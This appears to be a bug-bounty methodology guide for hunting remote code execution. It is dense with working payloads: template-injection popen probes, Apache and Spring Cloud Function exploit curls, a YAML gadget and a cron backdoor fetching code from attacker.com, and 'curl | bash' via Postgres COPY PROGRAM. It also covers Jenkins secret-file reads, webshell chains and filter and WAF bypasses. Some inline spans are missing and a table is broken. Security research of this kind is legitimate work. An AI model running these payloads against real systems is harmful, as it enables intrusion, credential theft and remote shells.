Crown Jewel Targets
RCE vulnerabilities command the highest payouts in bug bounty programs because they grant attackers direct execution control over target infrastructure. The highest-value targets are:
Highest-paying asset types:
- Enterprise server products (GitHub Enterprise Server, self-hosted GitLab) — privilege escalation chains from low-privileged console roles to root SSH access consistently pay critical/high
- Supply chain / package registries — dependency confusion attacks against npm, PyPI, etc. hit critical severity across every major program
- Cloud-native infrastructure — exposed Kubernetes API servers, ingress controllers, and misconfiqured CI/CD pipelines
- Mobile app backends and OAuth flows — where server-side processing of attacker-controlled data meets execution contexts
- Admin/management consoles — template injection in configuration panels reaches root with a single payload
Why this class pays most:
- Blast radius is infrastructure-wide, not user-scoped
- Proof-of-concept is unambiguous — shell output is undeniable
- Fix requires architectural changes, not just a patch
- Programs cannot afford false negatives on RCE
Attack Surface Signals
URL Patterns
/management-console/*
/admin/settings/*
/api/v*/exec
/api/v*/run
/webhook/*
/_internal/*
/import?url=
/render?template=
/preview?format=
Response Headers / Tech Stack Signals
X-Powered-By: Express # Node.js — npm dependency surface
X-Powered-By: Phusion Passenger
Server: nginx (ingress-nginx) # Kubernetes ingress — path field injection
X-Runtime: Ruby # Rails ActiveStorage, RDoc, REXML attack surface
Content-Type: application/yaml # YAML parsers (SnakeYAML, Psych) — deserialization
X-GitHub-Enterprise-Version # GHAS — nomad template, collectd, syslog-ng injection
JavaScript / Frontend Signals
javascript
// Look for these patterns in JS bundles
fetch('/api/exec', {method:'POST', body: cmd})
eval(userInput)
new Function(userInput)
document.write(unsafeData)
window.location = userControlled // URL scheme bypass → JS execution
Tech Stack Signals
| Signal | RCE Vector |
|---|
| in config UI | Template injection → |
| config editable | Config injection → destination |
| config editable | Plugin exec injection |
| in classpath | !!javax.script.ScriptEngineManager [...]
|
| npm internal scope | Dependency confusion |
| ingress-nginx annotations | Path field regex bypass |
Step-by-Step Hunting Methodology
-
Map the execution contexts first. Before testing payloads, identify everywhere user-controlled input touches an execution layer: template engines, shell commands, YAML parsers, file paths used in operations, package resolution, and configuration files.
-
Enumerate admin/management interfaces. Crawl for
,
,
,
,
. These surfaces are lower-auth and higher-privilege — the GHES cluster produced 6 separate RCEs from one console role.
-
Check template injection in every config field. In any management UI that accepts free-form configuration (log destinations, notification formats, proxy settings), submit
,
,
. Look for
in responses, logs, or DNS callbacks.
-
Test YAML/XML/serialized input for code execution. Any endpoint accepting
Content-Type: application/yaml
or
:
- SnakeYAML: submit
!!javax.script.ScriptEngineManager
- Ruby YAML: submit
!ruby/object:Gem::Installer
- REXML: submit billion-laughs / quadratic blowup XML
-
Hunt dependency confusion. For every npm/pip/gem internal package name visible in JS bundles, error messages, or
in public repos — register a higher-versioned package on the public registry pointing to a canary callback.
-
Check file path operations for traversal → execution. ActiveStorage, file upload handlers, symlink operations: submit
../../../etc/cron.d/shell
as filename. Confirm write then trigger execution.
-
Audit Kubernetes/cloud-native surfaces. Run
against any exposed API server. Check ingress annotations, especially
nginx.ingress.kubernetes.io/configuration-snippet
and
spec.rules.http.paths.path
for Lua/regex injection.
-
Test OAuth redirect URI and URL scheme handlers. Mobile apps processing
or
URIs via OAuth redirect may execute JavaScript. Try
javascript:alert(document.cookie)
and custom scheme URIs.
-
Verify with out-of-band callbacks. Never rely solely on visible output. Use Burp Collaborator, interactsh, or
DNS tokens. Blind RCE is common in backend processors.
-
Chain privileges. A low-severity misconfiguration (editor role, CSRF, path traversal) combined with an RCE primitive equals critical. Always ask: "what can I reach from here?"
Payload & Detection Patterns
Template Injection Probes
# Generic polyglot — works across Jinja2, Twig, Freemarker, Pebble, Velocity
{{7*7}}${7*7}#{7*7}<%= 7*7 %>*{7*7}
{{'7'*7}}
{{config}}
{{self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read()}}
# Nomad template injection (Go text/template)
{{ env "NOMAD_SECRET_ID" }}
{{ with secret "secret/data/prod" }}{{ .Data.password }}{{ end }}
{{ runscript "id" }}
Apache HTTP Server alias path traversal (CVE-2021-41773 / CVE-2021-42013)
Path normalization bug in Apache 2.4.49 (and the 2.4.50 patch-bypass) lets an attacker escape DocumentRoot via dot-encoded segments through configured alias paths. The same primitive yields very different impact depending on which alias accepts the traversal:
- Alias without (e.g. ) → arbitrary file read only
- Alias with (e.g. ) → arbitrary code execution
Version fingerprint:
bash
curl -sI http://target/ | grep -i "Server:"
# Vulnerable: Apache/2.4.49 (CVE-2021-41773) or Apache/2.4.50 (CVE-2021-42013)
# Patched: Apache/2.4.51+
File-read test (any alias):
bash
curl --path-as-is "http://target/icons/.%2e/.%2e/.%2e/.%2e/etc/passwd"
# Note: --path-as-is is REQUIRED — curl normalizes %2e by default
RCE test (cgi-enabled alias only):
bash
curl --path-as-is -X POST \
-d "echo Content-Type: text/plain; echo; id; uname -a; hostname" \
"http://target/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh"
Triage discipline note: when the same path-traversal primitive works on multiple aliases but only one is CGI-enabled, the
maximum impact is the severity — not the average. A "file read" finding on
should always be escalated by re-probing
(and any other alias visible from
blocks in the server-info disclosure or response patterns). See
Pre-Severity Gate.
Spring Cloud Function SpEL injection (CVE-2022-22963)
Spring Cloud Function ≤ 3.2.2 (and ≤ 3.1.6) evaluates the
spring.cloud.function.routing-expression
header as a SpEL expression on the
endpoint without auth, before any routing logic. Wide deployment in AWS Lambda + Cloud Run + on-prem function platforms. Often exposed externally because
auto-registers and devs don't add an explicit gate.
Detection:
- Spring-style port 8080 with , , or arbitrary single-word function endpoints responding 200
- Confirm with
curl -s http://target:8080/uppercase -H "Content-Type: text/plain" --data-binary "test"
- Version banner via or response headers
Exploit:
bash
curl -X POST http://target:8080/functionRouter \
-H "Content-Type: text/plain" \
-H 'spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec(new String[]{"id"})' \
--data "x"
The
new String[]{"...", "..."}
array form avoids shell-quoting issues that break the more common
form when the SpEL header contains parentheses or quotes.
Generalizes to: any Spring application that takes user input into a
SpelExpressionParser.parseExpression()
call, especially when delivered via header / query-param routes that bypass normal auth filters. See
for the broader SpEL fingerprinting (
= Spring Thymeleaf).
SnakeYAML RCE Gadget
yaml
!!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["http://attacker.com/exploit.jar"]
]]
]
Ruby YAML / rdoc_options RCE
yaml
--- !ruby/object:Gem::Installer
i: x
Dependency Confusion Detection
bash
# Find internal package names
grep -r '"name"' node_modules/ | grep '@internal\|@company\|@private'
# Check if public registry has higher version
npm view @target-company/internal-package version 2>/dev/null
Ingress-nginx Path Injection
# In spec.rules.http.paths.path
/something)(;.*);#
# Results in nginx config injection
Kubernetes Exposed API Check
bash
curl -sk https://TARGET:6443/api/v1/namespaces/default/pods \
-H "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)"
kubectl --insecure-skip-tls-verify -s https://TARGET:6443 get pods --all-namespaces
Out-of-Band RCE Confirmation
bash
# Payload to confirm blind RCE via DNS
curl "http://$(id | base64).YOUR-INTERACTSH-URL/"
nslookup $(whoami).attacker.com
wget http://attacker.com/$(cat /etc/hostname)
ActiveStorage Path Traversal → RCE
# Filename in upload request
filename="../../../../etc/cron.d/backdoor"
# Cron payload content
* * * * * root curl http://attacker.com/shell | bash
Args4j -prefix file expansion (Jenkins CVE-2024-23897 family)
Java CLIs built on the
library default to
, which expands
arguments by reading the file and treating each line as a separate command argument. When such a CLI is exposed over HTTP (Jenkins CLI is the canonical case), the server-side error message echoes failed arguments back — turning argument echoing into an arbitrary file-read primitive. Unauthenticated when "anonymous read access" is on (Jenkins default for fresh installs).
Detection:
- Target exposes and
/jnlpJars/jenkins-cli.jar
- Or: any Java app whose CLI source uses args4j without
Test (Jenkins):
bash
# Get the legit CLI jar from the target
curl -sLO http://target:8080/jnlpJars/jenkins-cli.jar
# First line of file leaks via 'help' error
java -jar jenkins-cli.jar -s http://target:8080/ -http help 1 @/etc/passwd
# → ERROR: Too many arguments: root:x:0:0:root:/root:/bin/bash
# Full file leaks via 'connect-node' (every line returned as a "no such agent" error)
java -jar jenkins-cli.jar -s http://target:8080/ -http connect-node @/etc/passwd
# → All passwd lines echoed back
# Recon: env vars + JENKINS_HOME path
java -jar jenkins-cli.jar -s http://target:8080/ -http help 1 @/proc/self/environ
Crown-jewel files after JENKINS_HOME confirmed:
/var/jenkins_home/secret.key
/var/jenkins_home/secrets/master.key
/var/jenkins_home/credentials.xml
/var/jenkins_home/users/*/config.xml
/var/jenkins_home/jobs/*/config.xml
Pattern generalizes beyond Jenkins. Any Java service that:
- Embeds args4j (most enterprise Java CLIs since 2010s)
- Exposes the CLI handler over HTTP (Jenkins, Hudson forks, custom internal tools)
- Returns argument-parsing errors verbatim to the client
→ same arbitrary-read primitive applies. Validation via
Reproducibility Gate: confirm the leak on at least 2 distinct commands (e.g.,
and
) and verify the file content actually appears in the response, not just a generic 500.
Grep Patterns for Source Review
bash
# Command injection sinks
grep -rn "exec\|system\|popen\|spawn\|eval\|subprocess" --include="*.rb" .
grep -rn "Runtime.exec\|ProcessBuilder\|ScriptEngine" --include="*.java" .
# Template engine instantiation
grep -rn "Mustache\|Handlebars\|nunjucks\|render_template\|Template\(" .
# Unsafe YAML load
grep -rn "yaml\.load\b\|YAML\.load\b" . # without Loader= argument
grep -rn "Yaml()\|new Yaml()" --include="*.java" .
Common Root Causes
1. Configuration-as-code with insufficient sanitization
Administrators edit configuration files (syslog-ng, collectd, nomad) through web UIs. Developers assume admin == trusted, so they pass field values directly into config files that support execution primitives (
destinations, exec plugins, template functions).
2. Template engines in privileged contexts
Go's
, Freemarker, Velocity, and Twig are used for system configuration rendering. When user-controlled strings reach these engines without sandboxing, arbitrary code follows.
3. Dependency confusion / namespace squatting
Internal packages published to private registries without locking the public registry namespace. Build systems that prefer public registries by default, or that fall through to public when the private registry lacks a package.
4. Unsafe deserialization of YAML/XML
Developers use
without safe loaders, or
(SnakeYAML) without type restrictions. Ruby's
and Java's SnakeYAML both support arbitrary object instantiation by default.
5. Path traversal in file operation chains
Filenames accepted from user input are used in filesystem operations without normalization. Rails ActiveStorage, file upload handlers, and rdoc generators trust the
parameter.
6. Assuming low-privilege roles can't reach execution contexts
The GHES management console granted "Editor" roles access to configuration fields that touched shell execution. Developers assumed privilege boundaries existed at a higher architectural level.
7. Missing input validation on infrastructure-facing fields
Ingress/nginx annotation values, Kubernetes spec fields, and webhook URLs are treated as opaque strings — but the downstream processor (nginx config generator, regex engine) interprets them as code.
Bypass Techniques
Bypass: Shell metacharacter filtering
bash
# Blocked: ; | & ` $()
# Bypass using $IFS and encodings
cat${IFS}/etc/passwd
{cat,/etc/passwd}
$'\x63\x61\x74' /etc/passwd # hex encoding
$(printf '\x63\x61\x74') /etc/passwd
# Newline injection when semicolons blocked
payload=$'\ncurl attacker.com\n'
Bypass: URL scheme allowlist (javascript: blocked)
# Mobile apps often block javascript: but miss:
jAvAsCrIpT:alert(1) # case variation
javascript:alert(1) # HTML entity
javascript:void(alert(1)) # void wrapper
intent://attacker.com#Intent;scheme=javascript;...
data:text/html,<script>alert(1)</script>
Bypass: YAML safe_load / type restrictions
yaml
# If !!java.* is blocked, try legitimate classes with side effects
!!com.sun.rowset.JdbcRowSetImpl
dataSourceName: 'ldap://attacker.com/a'
autoCommit: true
# Or find allowlisted types with dangerous constructors
Bypass: npm scope restrictions
# If @company/* is monitored, look for unscoped internal names
# e.g., "internal-utils" instead of "@company/internal-utils"
# Public registries serve unscoped packages first
Bypass: Path traversal filters
# Basic filter bypass
../ → ..%2F → %2e%2e%2f → ....//
# Double encoding
%252e%252e%252f
# Unicode normalization
..%c0%af (overlong UTF-8)
# Null byte (older systems)
../../etc/passwd%00.jpg
Bypass: Template injection with output filtering
# If {{ }} is sanitized on output but not evaluation:
{% for x in range(1) %}{{ lipsum.__globals__.os.popen('id').read() }}{% endfor %}
# Blind — use DNS callback instead of output
{{ lipsum.__globals__.os.popen('nslookup $(id).attacker.com').read() }}
Bypass: WAF blocking , ,
ruby
# Ruby
send(:system, "id")
method(:exec).call("id")
Kernel.send(:`, "id")
Object.const_get(:Kernel).system("id")
Gate 0 Validation
Before writing the report, confirm all three:
1. What can the attacker DO right now?
You must be able to demonstrate one of: execute
/
and capture the output, make a DNS/HTTP callback from the target server to your controlled host, write a file to the filesystem, or read
. "Might be able to" fails this gate.
2. What does the victim LOSE?
Articulate the concrete impact: source code exfiltration, credential theft (database, API keys, cloud IAM), lateral movement to internal network, supply chain compromise of downstream users, data destruction. Generic "attacker gains RCE" fails — name the crown jewels at risk.
3. Can it be reproduced in 10 minutes from scratch?
Write the reproduction steps before submitting. If you need more than: (a) a Burp request, (b) a payload file, and (c) a listener — simplify it. If reproduction requires a specific race condition, timing, or ephemeral state, document the exact conditions. Triagers who can't reproduce in one attempt will downgrade or close the report.
Real Impact Examples
Scenario A: Management Console Role → Root Shell (Enterprise Server)
An attacker with a low-privileged "Management Console Editor" account on a GitHub Enterprise Server instance identified that the syslog-ng configuration UI accepted a free-form "destination" field. By injecting a
destination containing a reverse shell command, the attacker caused the syslog-ng daemon (running as root) to execute arbitrary OS commands upon log receipt. The same attack surface was independently found in collectd's exec plugin configuration and nomad's job template rendering — all reachable from the same editor role. Impact: full root compromise of the enterprise git server hosting all organization source code, secrets, and CI/CD pipelines.
Scenario B: Dependency Confusion → RCE on Build Infrastructure
A researcher enumerated internal npm package names by reviewing JavaScript bundles served from target CDN endpoints and public GitHub repositories belonging to a major payments platform. Several
scoped packages were referenced but not registered on the public npm registry. The researcher published higher-versioned packages with identical names containing a postinstall script that executed a canary callback. Within hours, the callback fired from multiple IP addresses belonging to the target's CI/CD build farm — confirming that every npm install on their build infrastructure executed attacker-controlled code. The same technique worked against a ride-sharing platform's internal tooling. Impact: arbitrary code execution on build servers with access to production deployment credentials and signing keys.
Scenario C: Exposed Kubernetes API → Cluster Takeover
During reconnaissance on a target's cloud infrastructure, a researcher discovered a publicly accessible Kubernetes API server (port 6443) with overly permissive RBAC. Using default service account tokens and unauthenticated API calls, the researcher enumerated running pods, retrieved secrets from the default namespace (including database credentials and third-party API keys), and demonstrated the ability to spawn privileged pods with
— enabling full node compromise. The Kubernetes cluster managed the target's core production services. Impact: access to all stored secrets, ability to deploy malicious workloads, and pivot to every service in the cluster.
Chains & Compositions (Senior Hunting)
RCE in 2020-2026 rarely arrives at a single sink. Every modern RCE is composed of (1) a primitive that puts attacker bytes onto the host or into a deserialization pipeline, plus (2) an exec gadget that interprets them. The chains below decompose six high-paying RCE shapes into their primitive components — each step is testable in isolation, the chain is what pays.
Chain 1 — SSRF + IMDSv1 + Leaked IAM Role → Lambda Invoke → Backend RCE (Capital One pattern)
- A. SSRF on a server-side fetcher (link-preview, image proxy, webhook URL, PDF generator). Confirmed via Burp Collaborator OOB callback.
- B. Point SSRF at AWS IMDSv1 metadata:
http://169.254.169.254/latest/meta-data/iam/security-credentials/<role>
- C. Use the credentials with
aws lambda invoke --function-name <internal-function>
- Impact: Full backend RCE in the Lambda context, plus pivot path to whatever else the role grants (S3 / DynamoDB / RDS).
- Real shape: Capital One 2019 — $80M civil penalty, attacker conviction. SSRF in a WAF on EC2 → IMDSv1 → IAM role → 106M-record breach via S3 sync. Cross-refs Disclosed Report Citation #6.
Chain 2 — SQLi + → Direct OS-level RCE on Postgres Host
- A. SQLi confirmed on a Postgres backend (boolean/time-based works; UNION not needed).
- B. The DB user has either or privileges (default for many AWS RDS / Google Cloud SQL roles when "admin" databases exist).
- C. Stack a query:
'; COPY users FROM PROGRAM 'curl http://attacker/x.sh | bash'; --
/bin/sh -c <attacker command>
- Impact: RCE as the database user, which on managed Postgres frequently has IAM credentials and direct access to other AWS resources.
- Real shape: Multiple H1 disclosures 2020-2024 across SaaS apps backed by Postgres. Cross-refs Disclosed Report Citation #12 and root cause discussion of / privileges.
Chain 3 — Image Upload + Path Traversal in Filename + Misconfigured MIME Serving → Webshell
- A. File upload accepts images (, ). The server saves with the user-supplied filename or only validates Content-Type, not actual content.
- B. Upload a // file with the correct image magic-bytes ( + PHP after) and a filename containing to write outside the upload directory into the web-root (
../../../public/webshell.php
- C. Request
https://target/webshell.php?cmd=id
- Impact: Unauthenticated or low-priv attacker gets webshell on the application server with the web-server's process privileges.
- Real shape: Multiple disclosed H1 cases on legacy upload handlers; canonical pre-2020 RCE class. Pairs with (upload bypass table) and path-traversal patterns.
Chain 4 — Prototype Pollution + Lodash/Mongoose Gadget Chain → → Node RCE
- A. Identify prototype pollution sink — JSON merge / Object.assign / lodash / Node chain receiving attacker JSON.
- B. Pollute to OR
Object.prototype.env.NODE_OPTIONS
- C. Sink executes with attacker-controlled shell/env → attacker code runs in Node.js process context with full access to environment variables, AWS metadata, internal services.
- Impact: Server-side JS execution from a JSON POST. Common in Express apps using + for config-merging.
- Real shape: CVE-2018-16487, CVE-2019-10744, CVE-2020-8203; CVE-2024-53900 (cross-refs Disclosed Report Citation #10 — same gadget family reaches Mongo instead of process).
Chain 5 — Unencrypted ViewState + Recovered MachineKey → ASP.NET Deserialization → RCE (ToolShell class)
- A. Identify an ASP.NET endpoint where (ViewState is signed but not encrypted). Confirm via Burp / curl on form-bearing pages.
- B. Recover the validationKey — via config leak ( accessible), via subdomain takeover of a sibling app sharing the key, or via the CVE-2025-53771 ToolShell exploit chain that exfils the key on Subscription Edition.
- C. Forge a ViewState using
ysoserial.net --plugin=ViewState --validationkey=<key>
- Impact: Full RCE on the IIS web front-end with whatever the AppPool identity grants — often (with SharePoint farm-account access) or higher.
- Real shape: CVE-2025-53770 / 53771 ToolShell (July 2025 emergency advisory); SP2013 unpatched-by-EoL exposure. Cross-refs ToolShell precondition chain and ViewState dual-parser anti-pattern.
Chain 6 — XXE + PHP Stream Wrapper → Direct RCE on Legacy PHP
- A. XXE confirmed via OOB DTD callback (
<!ENTITY % x SYSTEM "http://attacker/dtd">
- B. Target runs PHP with the extension enabled (rare in 2026, but still present on legacy hosts and some shared-hosting providers).
- C. Send
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "expect://id">]><foo>&xxe;</foo>
- Impact: RCE as the PHP/web-server user without needing a separate upload or SQLi primitive.
- Real shape: Rockstar Games emblem editor XXE H1 #347139 (2018, $1,500); Adobe Commerce CosmicSting CVE-2024-34102 (XXE → RCE via crypt-key exfil). Cross-refs Disclosed Report Citation #7 and #10.
Operator-level pattern
Every modern RCE chain has two halves: the bytes get there (SSRF, SQLi, upload, prototype-pollution, ViewState, XXE) and the bytes get interpreted (lambda invoke, COPY PROGRAM, webshell handler, child_process.spawn, deserializer gadget, expect://). Hunt for the first half; the second is usually one of the six above. If your first-half primitive doesn't compose with any of these — pause before submitting. "Could lead to RCE" is Low/Medium; "RCE demonstrated end-to-end" is Critical.
Cross-references:
- — Chain 1
- — Chain 2
- — Chain 3
- (proto-pollution) — Chain 4
- + — Chain 5
- — Chain 6
Related Skills & Chains
- — Template engines that hit // are RCE hiding behind a render call. Chain primitive: Jinja2
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}
- — File-write primitives become RCE when the upload directory is web-served, processed by a deserializer, or loaded by a /. Chain primitive: SVG/PHP polyglot bypasses MIME check → direct
GET /uploads/shell.php?cmd=id
- — When the RCE primitive lives on an internal-only endpoint (admin console, internal Redis, Jenkins script-console), gate it through an SSRF. Chain primitive: external SSRF →
http://127.0.0.1:8080/manage/scriptText
- — ASP.NET ViewState deserialization is a giant RCE class behind a known parameter. Chain primitive: machineKey recovery (or leaked from disclosure) →
ysoserial.net -p ViewState -g TypeConfuseDelegate
- — Reach for the deserialization payload tree (ysoserial Java gadget chains, ysoserial.net for .NET ViewState/BinaryFormatter, Python pickle , Ruby Marshal, PHP metadata, Node IIFE) the moment you have a sink that accepts serialized bytes.
- — Apply the Pre-Severity Gate before claiming Critical. A "blind RCE" that turns out to be file-write-only with no execution path is not RCE; a sandboxed eval that can't reach is at best Medium SSTI. Prove /OOB DNS callback with a unique marker before writing the report.